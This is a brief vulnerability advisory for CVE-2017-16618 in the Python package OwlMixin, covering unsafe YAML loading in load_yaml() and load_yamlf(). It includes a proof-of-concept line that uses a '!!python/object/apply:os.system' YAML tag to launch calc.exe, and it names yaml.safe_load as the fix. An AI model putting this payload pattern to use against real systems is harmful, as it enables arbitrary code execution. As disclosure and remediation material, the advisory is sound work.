CVE-2017-16618: Convert Through OwlMixin

Python Package:　　OwlMixin

Version:　　　　　 Before 2.0.0a12

Published:　　　　Nov. 7th. 2017

Reported by: 　　　　　 Joel

CVE-2017-16618 　　　CVE_details

Overview

OwlMixin is a Library which converts data class instance and others each other.Recently,an issue was discovered in the owlmixin package before 2.0.0a12.Untrusted data passed into the load_yaml() and the load_yamlf() functions can execute arbitrary python commands resulting in command execution.

POC

1
2
3
4

from owlmixin import util
util.load_yaml('!!python/object/apply:os.system ["calc.exe"]')
util.load_yamlf('joel.yml','utf-8')
#'joel.yml'：!!python/object/apply:os.system ["calc.exe"]

Poc Video

Remediation

The updated versions of OwlMixin (2.0.0a12) correctly use the yaml.safe_load method which prevents remote code execution.